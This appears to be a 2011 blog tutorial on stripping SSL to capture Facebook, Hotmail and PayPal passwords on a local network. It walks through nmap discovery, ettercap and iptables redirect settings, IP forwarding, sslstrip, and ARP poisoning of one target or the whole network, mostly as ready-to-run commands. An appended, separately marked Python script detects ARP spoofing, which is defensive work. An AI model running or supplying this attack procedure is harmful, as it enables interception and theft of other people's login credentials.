Tuesday 15 November 2011

Sniff SSL | https password sniffing

Tool requirements:
sslstrip, ettercap and arpspoof (all already included in BackTrack).

Procedure
Ok, well, I've seen a couple of people complaining about not being able to sniff Facebook, Hotmail and PayPal passwords. This is because these sites use an https connection, so before you can sniff these passwords in a MITM attack you need to strip the SSL. Ettercap does have an SSL stripping ability, but we're going to use sslstrip because it's better.

First, you need BackTrack 4 pre-final. Or you can use another Linux distro and add the tools yourself.
1. First we need to find out what your subnet and default gateway are. Open up a shell.
Code:
route

You will get something like this:
Code:
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     *               255.255.255.0   U     0      0        0 wlan0
default         192.168.1.254   0.0.0.0         UG    0      0        0 wlan0

In my case 192.168.1.254 is the gateway. Therefore 192.168.1.1 is the subnet, and that is what we use with nmap.

2. Now we use nmap to find other machines on the network.
Code:
nmap -sP 192.168.1.1/24 |grep "Host"

3. Now we need to enable the iptables redirect commands in ettercap's config file.
Code:
nano /etc/etter.conf

Scroll down until you find these lines in the file:
Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Change them to this (uncomment both lines):
Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Hit Ctrl-X, then y, then Enter to save.

4. Now we create the iptables rule that redirects port 80 traffic to sslstrip.
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Now we need to enable IP forwarding.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

6. Now we need to find the interface you're using.
Code:
ifconfig

Find the interface with your IP address listed underneath it. In my case it's wlan0.


7. Now start sslstrip.
Code:
sslstrip -a -k -f

OPTION A: (better)
1. Open a new shell and start arpspoof
Code:
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.254

wlan0 is my interface
192.168.1.101 is my target ip
192.168.1.254 is my gateway

2. Finally, open up another shell and start ettercap in sniffer mode.
Code:
ettercap -T -q -i wlan0

wlan0 is your interface.
The sniffed passwords will come up in the ettercap window.
Last thing: arpspoof will not re-ARP the victims for you, so just start ARP spoofing with ettercap and shut it down right away.

Code:
ettercap -T -M arp:remote -i wlan0 /192.168.1.254/ /192.168.1.101/

interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101

Then just hit "q" and ettercap will re-ARP your victim. I usually already have this command typed and ready to go in a new shell so I can quickly fix the ARP cache when I'm done.

OPTION B: (easier)
Open up a new shell and start ettercap.
Code:
ettercap -T -i wlan0 -q -M arp:remote /192.168.1.254/ /192.168.1.101/

interface: wlan0
gateway: 192.168.1.254
target: 192.168.1.101 (leave target blank "//" to poison entire network)
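On the defending side, the poisoning done above leaves a recognisable trace in the victim's ARP cache: the gateway's MAC changes, and one MAC ends up answering for more than one IP. The following is an added example (not part of the original post) that spots both signatures in two constructed /proc/net/arp snapshots for the post's setup (gateway 192.168.1.254 on wlan0); the MAC addresses and the second host are made up for the example.

```python
from collections import defaultdict

# Constructed /proc/net/arp snapshots as seen on the victim (192.168.1.101).
# MACs are invented for the example. In the poisoned snapshot the gateway IP
# now resolves to the same MAC as another host on the segment.
BASELINE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.254    0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.105    0x1         0x2         66:77:88:99:aa:bb     *        wlan0
"""

POISONED = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.254    0x1         0x2         66:77:88:99:aa:bb     *        wlan0
192.168.1.105    0x1         0x2         66:77:88:99:aa:bb     *        wlan0
"""

def parse_arp_table(text):
    """Return {ip: mac} for complete (flags 0x2) entries of a /proc/net/arp dump."""
    table = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 6 or fields[2] != "0x2":
            continue                            # incomplete or malformed entry
        table[fields[0]] = fields[3].lower()
    return table

def detect_arp_spoof(baseline, current, gateway_ip):
    """Compare a learned baseline with the current cache and return alert strings.

    Signature 1: the gateway's MAC differs from the baseline.
    Signature 2: a single MAC claims several IPs (attacker's own plus the gateway).
    """
    alerts = []
    before, after = parse_arp_table(baseline), parse_arp_table(current)
    if gateway_ip in before and gateway_ip in after and before[gateway_ip] != after[gateway_ip]:
        alerts.append(f"gateway {gateway_ip} moved from {before[gateway_ip]} to {after[gateway_ip]}")
    ips_by_mac = defaultdict(list)
    for ip, mac in after.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(BASELINE, POISONED, "192.168.1.254"):
        print("ALERT:", alert)
```

On a live host, read /proc/net/arp periodically and feed the first clean snapshot in as the baseline; a static ARP entry for the gateway is the simple mitigation for the attack the post describes.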
